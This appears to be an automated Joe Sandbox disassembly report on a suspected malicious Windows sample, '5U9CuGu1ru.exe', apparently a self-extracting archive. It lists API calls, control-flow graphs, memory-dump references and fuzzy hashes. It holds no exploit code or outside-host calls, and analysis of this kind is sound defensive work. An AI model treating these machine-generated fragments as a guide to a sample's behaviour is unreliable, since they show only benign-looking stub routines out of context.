              • API String ID: 1999340476-0
              • Opcode ID: 14c54dfc611fed395b43a0e6e33537ec3a1009f155a203b7a2469c606e7da78d
              • Instruction ID: 1b502e61b6c85a5a6e770a8b73b5453b71c31a67577f36fc01fe636994d04bb5
              • Opcode Fuzzy Hash: 14c54dfc611fed395b43a0e6e33537ec3a1009f155a203b7a2469c606e7da78d
              • Instruction Fuzzy Hash: 6D415830644B566FE3308B24CC05BDABBD4FB45324F100719F9E4D61D2E7B5A988CBA2

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1007 81ac74-81ac8d PeekMessageW 1008 81acc8-81accc 1007->1008 1009 81ac8f-81aca3 GetMessageW 1007->1009 1010 81aca5-81acb2 IsDialogMessageW 1009->1010 1011 81acb4-81acc2 TranslateMessage DispatchMessageW 1009->1011 1010->1008 1010->1011 1011->1008
              APIs
              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0081AC85
              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0081AC96
              • IsDialogMessageW.USER32(00010450,?), ref: 0081ACAA
              • TranslateMessage.USER32(?), ref: 0081ACB8
              • DispatchMessageW.USER32(?), ref: 0081ACC2
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: Message$DialogDispatchPeekTranslate
              • String ID:
              • API String ID: 1266772231-0
              • Opcode ID: 9715975923882e616f6676bdefea762ff7ef24c7c904b2decb87f4dc38e18085
              • Instruction ID: 961e6d1809c8db9143d46fb7a652ac623de4cfbf93457dda28bbf06326ecdfcc
              • Opcode Fuzzy Hash: 9715975923882e616f6676bdefea762ff7ef24c7c904b2decb87f4dc38e18085
              • Instruction Fuzzy Hash: 73F01D71902529AB8B209BE1EC4CDEB7F6CFE052A17404555F505D2140EA64D545CBF2

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1012 8276bd-8276ca 1013 8276e8-827711 call 82b290 GetModuleFileNameA 1012->1013 1014 8276cc-8276d0 1012->1014 1020 827713-827716 1013->1020 1021 827718 1013->1021 1014->1013 1015 8276d2-8276e3 call 82895a call 828839 1014->1015 1026 8277dc-8277e0 1015->1026 1020->1021 1023 82771a-827744 call 8277e1 call 827956 1020->1023 1021->1023 1030 827752-82776f call 8277e1 1023->1030 1031 827746-827750 call 82895a 1023->1031 1037 827771-82777e 1030->1037 1038 827787-82779a call 82ada3 1030->1038 1036 827783-827785 1031->1036 1039 8277d1-8277db call 8284de 1036->1039 1037->1036 1044 8277a1-8277aa 1038->1044 1045 82779c-82779f 1038->1045 1039->1026 1047 8277b4-8277c1 1044->1047 1048 8277ac-8277b2 1044->1048 1046 8277c7-8277ce call 8284de 1045->1046 1046->1039 1047->1046 1048->1047 1048->1048
              APIs
              • GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\Desktop\5U9CuGu1ru.exe,00000104), ref: 008276FD
              • _free.LIBCMT ref: 008277C8
              • _free.LIBCMT ref: 008277D2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: _free$FileModuleName
              • String ID: C:\Users\user\Desktop\5U9CuGu1ru.exe
              • API String ID: 2506810119-2745502151
              • Opcode ID: a8a223cb307c5d5fefc87201618f34c65db4cd70239d0b25a3024b7983eff890
              • Instruction ID: 0a94316f27d80dba06de519fe8c8f02052a562160d3a8decbd128ff542a3da19
              • Opcode Fuzzy Hash: a8a223cb307c5d5fefc87201618f34c65db4cd70239d0b25a3024b7983eff890
              • Instruction Fuzzy Hash: 47318175A09228EFDF21DF9AEC8599EBBECFB95310B1440A6E804D7211DAB04EC0CB51

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1051 81d287-81d2b2 call 81e360 SetEnvironmentVariableW call 80fbd8 1055 81d2b7-81d2bb 1051->1055 1056 81d2bd-81d2c1 1055->1056 1057 81d2df-81d2e3 1055->1057 1058 81d2ca-81d2d1 call 80fcf1 1056->1058 1061 81d2c3-81d2c9 1058->1061 1062 81d2d3-81d2d9 SetEnvironmentVariableW 1058->1062 1061->1058 1062->1057
              APIs
              • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0081D29D
              • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0081D2D9
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: EnvironmentVariable
              • String ID: sfxcmd$sfxpar
              • API String ID: 1431749950-3493335439
              • Opcode ID: f611df85f832f23b6063204764e36a521c688b0ae1de1dfe2fe45d71b0d7fb3e
              • Instruction ID: 895f2c4051d4e584f92c86be5b9a48dcfc09ef689aa60a2bcb9d3fe2b95eaeaf
              • Opcode Fuzzy Hash: f611df85f832f23b6063204764e36a521c688b0ae1de1dfe2fe45d71b0d7fb3e
              • Instruction Fuzzy Hash: FBF08C72800628A7DB202F949C1ABEABB6CFF09B51B004411FD84E6242D675DD809AE2
              APIs
              • GetStdHandle.KERNEL32(000000F6), ref: 0080985E
              • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00809876
              • GetLastError.KERNEL32 ref: 008098A8
              • GetLastError.KERNEL32 ref: 008098C7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: ErrorLast$FileHandleRead
              • String ID:
              • API String ID: 2244327787-0
              • Opcode ID: 012ba828cca715a963a85f1bf6e1f53a1495433a84fb3eed7c33222505227ef1
              • Instruction ID: 7b50c28daf2c2fadc528f2e5d77731d237aac4f6730f140dedd0b7470408e477
              • Opcode Fuzzy Hash: 012ba828cca715a963a85f1bf6e1f53a1495433a84fb3eed7c33222505227ef1
              • Instruction Fuzzy Hash: 4F118E30900608EBDBA45B55CD04A7977ACFB46731F10C53AF8AAC5BD2D7359E409F52
              APIs
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0080CFE0,00000000,00000000,?,0082A49B,0080CFE0,00000000,00000000,00000000,?,0082A698,00000006,FlsSetValue), ref: 0082A526
              • GetLastError.KERNEL32(?,0082A49B,0080CFE0,00000000,00000000,00000000,?,0082A698,00000006,FlsSetValue,00837348,00837350,00000000,00000364,?,00829077), ref: 0082A532
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0082A49B,0080CFE0,00000000,00000000,00000000,?,0082A698,00000006,FlsSetValue,00837348,00837350,00000000), ref: 0082A540
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: LibraryLoad$ErrorLast
              • String ID:
              • API String ID: 3177248105-0
              • Opcode ID: 5c9958e5f4e5b67c1cc4289e68ecb2e163638b0b2bc33faa1ce0a9c1aff8feca
              • Instruction ID: 62b725f2570a10f0caad427ccb6bc0361895df3186df009eefaa3df0748a7df8
              • Opcode Fuzzy Hash: 5c9958e5f4e5b67c1cc4289e68ecb2e163638b0b2bc33faa1ce0a9c1aff8feca
              • Instruction Fuzzy Hash: 86012B32711636ABC7258BE8FD44A577B9CFF85FA17240921F906D7140D735D940CAE1
              APIs
              • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,0080CC94,00000001,?,?,?,00000000,00814ECD,?,?,?), ref: 00809F4C
              • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00814ECD,?,?,?,?,?,00814972,?), ref: 00809F8E
              • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,0080CC94,00000001,?,?), ref: 00809FB8
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: FileWrite$Handle
              • String ID:
              • API String ID: 4209713984-0
              • Opcode ID: 7f0ad6d8bb1a827f26d5768bd5369798f55f225ea4be465db49d1af210478ac6
              • Instruction ID: 425d3e9cce799aae76dd3699ccfc0d62a17333188a362cc4b953b82398a1713b
              • Opcode Fuzzy Hash: 7f0ad6d8bb1a827f26d5768bd5369798f55f225ea4be465db49d1af210478ac6
              • Instruction Fuzzy Hash: F631E57120870A9BDF548F14DD4876ABBA8FB90710F044A5DF985DB1D2CB74DD48CBA2
              APIs
              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0080A113,?,00000001,00000000,?,?), ref: 0080A22E
              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0080A113,?,00000001,00000000,?,?), ref: 0080A261
              • GetLastError.KERNEL32(?,?,?,?,0080A113,?,00000001,00000000,?,?), ref: 0080A27E
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: CreateDirectory$ErrorLast
              • String ID:
              • API String ID: 2485089472-0
              • Opcode ID: 627bef66c21d49fb43c54c68f742acc6ee066f79ef5094a135421a133ba9ba92
              • Instruction ID: 06ac665dd96c33fa314ef92cb6abf362aed60fa1995f71730a5b247f6b54c7f8
              • Opcode Fuzzy Hash: 627bef66c21d49fb43c54c68f742acc6ee066f79ef5094a135421a133ba9ba92
              • Instruction Fuzzy Hash: 8B01F53564171866DBBA9B788C06BED334CFF0A781F040861F801E60D1C766CA80C6B3
              APIs
              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0082B019
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: Info
              • String ID:
              • API String ID: 1807457897-3916222277
              • Opcode ID: 76ec90bd70968d21524ab4dc553ba01b6f61b3694fc7e7aadae5f84d73e3d8ea
              • Instruction ID: 8a9a63aa038482df6c37d6b6366149c6d0a787787295fb743d0cc55c7dbfdeb0
              • Opcode Fuzzy Hash: 76ec90bd70968d21524ab4dc553ba01b6f61b3694fc7e7aadae5f84d73e3d8ea
              • Instruction Fuzzy Hash: 9A41287050536CAADF228E28DC94AF7BBA9FF45308F1404ECE59AC7142D3359A95DF20
              APIs
              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 0082A79D
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: String
              • String ID: LCMapStringEx
              • API String ID: 2568140703-3893581201
              • Opcode ID: 58b7da5e1dce11d5ec490ae9322ab4a7b019c3f9a24654820630f49bf166758a
              • Instruction ID: 9ca30958b33598f86233b81ccce9a91e6de4c1b62f5ca6a299d747bca6362e0a
              • Opcode Fuzzy Hash: 58b7da5e1dce11d5ec490ae9322ab4a7b019c3f9a24654820630f49bf166758a
              • Instruction Fuzzy Hash: E901137250021CBBCF166FA4EC02DEE3F66FF48710F004554FE14A6260CA7A8A71EB92
              APIs
              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00829D2F), ref: 0082A715
              Strings
              • InitializeCriticalSectionEx, xrefs: 0082A6E5
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: CountCriticalInitializeSectionSpin
              • String ID: InitializeCriticalSectionEx
              • API String ID: 2593887523-3084827643
              • Opcode ID: 89053077b4032f42c76826f104122780c73eff678b0ffd35a7893818232bccc2
              • Instruction ID: 87d3e33c2a4c802a4aa547ba31442332c5118471305e9044bb71ec6d27219656
              • Opcode Fuzzy Hash: 89053077b4032f42c76826f104122780c73eff678b0ffd35a7893818232bccc2
              • Instruction Fuzzy Hash: FAF02E3060421CBBCB146F28DC06CAE7FA0FF94720F404014FC199A360DAB68A50EBC1
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: Alloc
              • String ID: FlsAlloc
              • API String ID: 2773662609-671089009
              • Opcode ID: e51bbced5caa362e5c4690af65625bf6cb7d9787da638e0f14d98f7c81e040e7
              • Instruction ID: 804b07bfab24babd4351703105a22e39b5948cb21e018fa106ffd2cd071bf0ad
              • Opcode Fuzzy Hash: e51bbced5caa362e5c4690af65625bf6cb7d9787da638e0f14d98f7c81e040e7
              • Instruction Fuzzy Hash: 10E055B074522C6B96246FA8AC028AEBB94FFA4711F400018FC05D7340EEB88E00A6D6
              APIs
              • try_get_function.LIBVCRUNTIME ref: 008232AF
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: try_get_function
              • String ID: FlsAlloc
              • API String ID: 2742660187-671089009
              • Opcode ID: 5cfaef653e0c887f3ef64387cc1369fc683b5b271af7d1f07392f599197bceb5
              • Instruction ID: 9c3f5d91da499c51c55bfe443b054f84b9dfc4fb25d338c1648bf9513cd111c5
              • Opcode Fuzzy Hash: 5cfaef653e0c887f3ef64387cc1369fc683b5b271af7d1f07392f599197bceb5
              • Instruction Fuzzy Hash: 8FD02B217806347B811032C4BC039AE7F44FB41FB2F450552FE08DA342B5A9459001C6
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081E20B
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID: 3Qo
              • API String ID: 1269201914-1944013411
              • Opcode ID: 33f30903de9226425152a4999d07c74864936e00eb62883b0101584c57dbbd96
              • Instruction ID: ee3d91c840886574b55fa07fcc823272cdc1564a64b512d594a7f5d6cf854ce6
              • Opcode Fuzzy Hash: 33f30903de9226425152a4999d07c74864936e00eb62883b0101584c57dbbd96
              • Instruction Fuzzy Hash: 05B012E226E5027C320C1149BD16DB7031CFCC0B50330801AB716D40809A414D8A4033
              APIs
                • Part of subcall function 0082AF1B: GetOEMCP.KERNEL32(00000000,?,?,0082B1A5,?), ref: 0082AF46
              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0082B1EA,?,00000000), ref: 0082B3C4
              • GetCPInfo.KERNEL32(00000000,0082B1EA,?,?,?,0082B1EA,?,00000000), ref: 0082B3D7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: CodeInfoPageValid
              • String ID:
              • API String ID: 546120528-0
              • Opcode ID: ffefdbfeb002dbf0b405ec27cc7cbce1574e28f122157e2d31bfc9569926f43a
              • Instruction ID: ad46812621128dcaf4f4b4608bef5602d263e3bd32f2f86973d2c9e6d22a292f
              • Opcode Fuzzy Hash: ffefdbfeb002dbf0b405ec27cc7cbce1574e28f122157e2d31bfc9569926f43a
              • Instruction Fuzzy Hash: 0E5145B09012259FDB24AF75E8C06BABBE4FF50310F18446ED096CB253D73595C1CB85
              APIs
              • __EH_prolog.LIBCMT ref: 00801385
                • Part of subcall function 00806057: __EH_prolog.LIBCMT ref: 0080605C
                • Part of subcall function 0080C827: __EH_prolog.LIBCMT ref: 0080C82C
                • Part of subcall function 0080C827: new.LIBCMT ref: 0080C86F
                • Part of subcall function 0080C827: new.LIBCMT ref: 0080C893
              • new.LIBCMT ref: 008013FE
                • Part of subcall function 0080B07D: __EH_prolog.LIBCMT ref: 0080B082
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: caa11ae97dd8d6700baaa3e945ec15c9d60b2a56ed217e9f3a8f1c598145214a
              • Instruction ID: 3cc58ff20a820f28d563af548d398bd4591c641bdba3f24967d3cc665a5bd9a2
              • Opcode Fuzzy Hash: caa11ae97dd8d6700baaa3e945ec15c9d60b2a56ed217e9f3a8f1c598145214a
              • Instruction Fuzzy Hash: 534116B0905B409ED724DF7988859E7FAE6FF18310F504A2ED6EEC3282DB326554CB16
              APIs
              • __EH_prolog.LIBCMT ref: 00801385
                • Part of subcall function 00806057: __EH_prolog.LIBCMT ref: 0080605C
                • Part of subcall function 0080C827: __EH_prolog.LIBCMT ref: 0080C82C
                • Part of subcall function 0080C827: new.LIBCMT ref: 0080C86F
                • Part of subcall function 0080C827: new.LIBCMT ref: 0080C893
              • new.LIBCMT ref: 008013FE
                • Part of subcall function 0080B07D: __EH_prolog.LIBCMT ref: 0080B082
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: dcfbad214cbd64f74e492db80747a5af0d59997fec27dc31c2b5e81ecbb453d6
              • Instruction ID: ba030e1cc996ae4b845d579a7c7150458673de51eb21580afc5b0e4d3c0f8b6e
              • Opcode Fuzzy Hash: dcfbad214cbd64f74e492db80747a5af0d59997fec27dc31c2b5e81ecbb453d6
              • Instruction Fuzzy Hash: 1D4106B0805B409ED724DF7988859E7FAE5FF18310F544A2ED6EEC3282DB326554CB16
              APIs
